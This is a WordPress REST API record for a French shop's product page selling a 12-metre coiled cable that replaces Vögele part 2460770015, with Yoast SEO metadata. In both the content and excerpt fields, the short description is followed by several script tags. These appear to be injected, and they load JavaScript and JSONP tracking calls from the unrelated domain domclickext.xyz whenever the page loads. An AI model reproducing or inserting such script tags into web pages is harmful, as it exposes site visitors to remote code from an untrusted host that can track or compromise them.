{"id":3009,"date":"2020-12-25T15:09:21","date_gmt":"2020-12-25T14:09:21","guid":{"rendered":"http:\/\/laserelectronique.com\/?product=import-placeholder-for-3040"},"modified":"2020-12-26T13:11:32","modified_gmt":"2020-12-26T12:11:32","slug":"cable-2460770015-vogele","status":"publish","type":"product","link":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele","title":{"rendered":"C\u00e2ble 2460770015 V\u00f6gele"},"content":{"rendered":"<div class=\"content--title\"><strong>C\u00e2ble \u00e0 spirale de 12 m remplace V\u00f6gele 2460770015&Prime;<\/strong><\/div>\n<div class=\"product--description\">\n<p><strong>C\u00e2ble de bobine de connexion de 12 m\u00e8tres de la bo\u00eete de jonction \/ du capteur \u00e0 l&rsquo;unit\u00e9 de commande de nivellement<\/strong><\/p>\n<ul>\n<li><strong>Longueur: 12 m\u00e8tres (\u00e9tir\u00e9)<\/strong><\/li>\n<li><strong>Connecteur: Baj 8 broches.\u00a0femelle, 8 broches Baj.\u00a0m\u00e2le<\/strong><\/li>\n<\/ul>\n<\/div>\n<p><strong>Devis gratuit.<\/strong><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_794787225&amp;key=212b3d4039ab5319ec&amp;cv=26&amp;t=1570991942226\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_974000746&amp;key=212b3d4039ab5319ec&amp;cv=1570991942&amp;t=1570991942228\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_684748246&amp;key=212b3d4039ab5319ec&amp;cv=1570991942&amp;t=1570991942229\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_380562927&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991942231\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_523039461&amp;key=212b3d4039ab5319ec&amp;cv=61&amp;t=1570991942239\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_987016665&amp;key=212b3d4039ab5319ec&amp;cv=1570991942&amp;t=1570991942240\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_542827004&amp;key=212b3d4039ab5319ec&amp;cv=1570991942&amp;t=1570991942241\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_959457816&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991942246\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":3058,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[11,14],"product_tag":[],"class_list":{"0":"post-3009","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-accessoires-de-nivellement","7":"product_cat-finisseurs","8":"","10":"first","11":"instock","12":"taxable","13":"shipping-taxable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP\" \/>\n<meta property=\"og:description\" content=\"&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele\" \/>\n<meta property=\"og:site_name\" content=\"LASER ELECTRONIQUE TP\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-26T12:11:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"1600\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele\",\"url\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele\",\"name\":\"C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP\",\"isPartOf\":{\"@id\":\"https:\/\/laserelectronique.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage\"},\"image\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage\"},\"thumbnailUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg\",\"datePublished\":\"2020-12-25T14:09:21+00:00\",\"dateModified\":\"2020-12-26T12:11:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage\",\"url\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg\",\"contentUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg\",\"width\":1600,\"height\":1600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/laserelectronique.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/laserelectronique.com\/?page_id=7\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"C\u00e2ble 2460770015 V\u00f6gele\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/laserelectronique.com\/#website\",\"url\":\"https:\/\/laserelectronique.com\/\",\"name\":\"LASER ELECTRONIQUE TP\",\"description\":\"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/laserelectronique.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele","og_locale":"fr_FR","og_type":"article","og_title":"C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP","og_description":"&nbsp;","og_url":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele","og_site_name":"LASER ELECTRONIQUE TP","article_modified_time":"2020-12-26T12:11:32+00:00","og_image":[{"width":1600,"height":1600,"url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele","url":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele","name":"C\u00e2ble 2460770015 V\u00f6gele - LASER ELECTRONIQUE TP","isPartOf":{"@id":"https:\/\/laserelectronique.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage"},"image":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage"},"thumbnailUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg","datePublished":"2020-12-25T14:09:21+00:00","dateModified":"2020-12-26T12:11:32+00:00","breadcrumb":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#primaryimage","url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg","contentUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-15580_Coil_Cable_Machine_Junction_Box_12m.jpg","width":1600,"height":1600},{"@type":"BreadcrumbList","@id":"https:\/\/laserelectronique.com\/?product=cable-2460770015-vogele#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/laserelectronique.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/laserelectronique.com\/?page_id=7"},{"@type":"ListItem","position":3,"name":"C\u00e2ble 2460770015 V\u00f6gele"}]},{"@type":"WebSite","@id":"https:\/\/laserelectronique.com\/#website","url":"https:\/\/laserelectronique.com\/","name":"LASER ELECTRONIQUE TP","description":"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/laserelectronique.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product\/3009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3009"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/media\/3058"}],"wp:attachment":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3009"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3009"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}